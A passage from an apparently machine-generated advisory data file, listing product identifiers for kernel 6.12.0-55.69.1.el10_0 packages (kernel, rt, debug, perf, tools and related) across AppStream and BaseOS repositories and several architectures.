"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
